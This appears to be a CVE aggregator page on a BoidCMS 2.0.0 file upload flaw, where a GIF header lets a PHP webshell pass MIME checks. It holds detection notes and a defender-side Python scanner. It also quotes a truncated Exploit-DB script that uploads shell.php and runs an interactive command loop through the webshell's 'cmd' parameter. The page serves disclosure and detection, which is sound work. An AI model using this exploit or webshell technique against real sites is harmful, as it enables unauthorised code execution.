CVE-2023-38836
Published 2023-08-21
CVE-2023-38836: File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.
Priority: P2 · 74 · high · 8.8 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 73.21% (99.4th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boidcms | boidcms | — | — |
Detection & IOCs (extracted from sources)
- Detect PHP webshell upload disguised with a GIF header to bypass MIME type checks — inspect uploaded files for a GIF magic bytes prefix (GIF89a or GIF8) followed by PHP code content, especially targeting the /media/ directory.
- Alert on POST requests to /admin?page=media containing a multipart file upload where the uploaded filename ends in .php — this is the exploitation upload endpoint.
- Alert on GET requests to /media/*.php with a 'cmd' query parameter — this indicates webshell command execution following a successful upload.
- Monitor for the presence of PHP files (e.g., shell.php) appearing under the /media/ directory of a BoidCMS installation, which should normally contain only media assets.
- Exploitation requires prior authentication to BoidCMS — the attacker must have valid credentials before abusing the file upload endpoint.
- The vulnerability affects BoidCMS version 2.0.0 and below; the bypass relies on adding a GIF header to a PHP file to defeat server-side MIME type validation.
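The detections listed above can be turned into three concrete checks: a scanner for the /media/ tree that flags files carrying a GIF signature followed by a PHP open tag (the bypass payload shape) or simply a .php extension, a multipart-body inspector that reports .php filenames posted to the upload endpoint, and an access-log matcher for POST /admin?page=media and GET /media/*.php?cmd= requests. The following is an added example written for this page; it is not code from the CVE record, from Exploit-DB or from the Metasploit module. The function names, the 64 KiB read window and all sample files and log lines are constructed for the demonstration.

```python
"""Defender-side checks for the BoidCMS GIF-header / PHP upload bypass.

Added example, not from the CVE record, Exploit-DB or Metasploit. All
sample files, the multipart body and the log lines are constructed.
"""
import os
import re
import tempfile
from typing import List, Optional, Tuple

GIF_MAGIC = (b"GIF87a", b"GIF89a")
# PHP open tags: "<?php" or the short echo tag "<?="
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# filename="..." parts of a multipart/form-data body
FILENAME_RE = re.compile(rb'Content-Disposition:[^\r\n]*\bfilename="([^"]*)"', re.IGNORECASE)
# access-log patterns for the upload endpoint and for webshell command execution
UPLOAD_ENDPOINT_RE = re.compile(r'"POST /admin\?page=media[^"]*"')
WEBSHELL_CMD_RE = re.compile(r'"GET /media/[^ "?]+\.php\?(?:[^ "&]*&)*cmd=')


def is_polyglot_php(data: bytes) -> bool:
    """A file that starts with a GIF signature but also contains a PHP open tag
    is the bypass payload shape: it passes a MIME/magic check yet runs as PHP."""
    return data.startswith(GIF_MAGIC) and PHP_TAG_RE.search(data) is not None


def scan_media_dir(path: str) -> List[Tuple[str, List[str]]]:
    """Walk a BoidCMS /media/ tree and report files that should not be there."""
    findings = []
    for root, _dirs, files in os.walk(path):
        for name in sorted(files):
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                head = fh.read(64 * 1024)  # assumed window: enough to catch a tag after the header
            reasons = []
            if name.lower().endswith(".php"):
                reasons.append("php-extension-in-media")
            if is_polyglot_php(head):
                reasons.append("gif-header-with-php-code")
            if reasons:
                findings.append((os.path.relpath(full, path), reasons))
    return findings


def uploaded_php_filenames(body: bytes) -> List[str]:
    """Filenames ending in .php inside a multipart upload body (for WAF/proxy inspection)."""
    names = FILENAME_RE.findall(body)
    return [n.decode("utf-8", "replace") for n in names if n.lower().endswith(b".php")]


def classify_log_line(line: str) -> Optional[str]:
    """Tag an access-log line with one of the two request-level alerts, if either applies."""
    if WEBSHELL_CMD_RE.search(line):
        return "webshell-command-execution"
    if UPLOAD_ENDPOINT_RE.search(line):
        return "media-upload-endpoint"
    return None


def demo() -> dict:
    """Build constructed samples in a temp dir and run all three checks over them."""
    with tempfile.TemporaryDirectory() as media:
        with open(os.path.join(media, "logo.gif"), "wb") as fh:
            fh.write(b"GIF89a\x01\x00\x01\x00\x80\x00\x00")          # constructed (truncated) GIF
        with open(os.path.join(media, "shell.php"), "wb") as fh:
            fh.write(b"GIF89a<?php echo 'marker'; ?>")               # constructed polyglot shape
        with open(os.path.join(media, "notes.txt"), "wb") as fh:
            fh.write(b"<?php is only a string here, no GIF header")  # not the bypass pattern
        files = scan_media_dir(media)

    # constructed multipart body as a proxy or WAF would see it on the upload endpoint
    body = (b"--x\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n"
            b"Content-Type: image/gif\r\n\r\nGIF89a<?php echo 'marker'; ?>\r\n--x--\r\n")
    # constructed combined-format access-log lines
    logs = [
        '10.0.0.5 - - [21/Aug/2023:10:00:00 +0000] "POST /admin?page=media HTTP/1.1" 302 0',
        '10.0.0.5 - - [21/Aug/2023:10:00:05 +0000] "GET /media/shell.php?cmd=id HTTP/1.1" 200 55',
        '10.0.0.9 - - [21/Aug/2023:10:01:00 +0000] "GET /media/logo.gif HTTP/1.1" 200 812',
    ]
    return {
        "files": files,
        "php_uploads": uploaded_php_filenames(body),
        "log_hits": [classify_log_line(line) for line in logs],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The file scanner reads only the first 64 KiB of each file, which is enough because the bypass puts the GIF signature at offset 0 and the PHP tag immediately after it; the access-log matcher cannot see uploaded filenames (they live in the request body), which is why the multipart check is separate and belongs on a proxy or WAF that inspects bodies.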
No detection rules found.
Exploit-DB: BoidCMS v2.0.0 - authenticated file upload vulnerability (exploitdb · 2023-10-09 · CVSS 8.8 · HIGH)
---
```python
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: ']
# (the indexed copy of the listing is truncated at this point; the requests
#  session `s`, `base_url`, `form_upld_data` and `php_code` are defined in
#  the omitted part)
with open('shell.php','w') as f:
    f.writelines(php_code)
#====
# upload the GIF-prefixed PHP file through the media page, then check it landed
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == 404:  # status_code is an int, not a string
    print("Upload failed")
    exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
    cmd=input("cmd >> ")
    if cmd=='exit': exit()
    req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
    print(req.text)
```
Metasploit: BoidCMS Command Injection (metasploit · CVSS 8.8 · HIGH)
This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.
No writeups or analysis indexed.
Published: 2023-08-21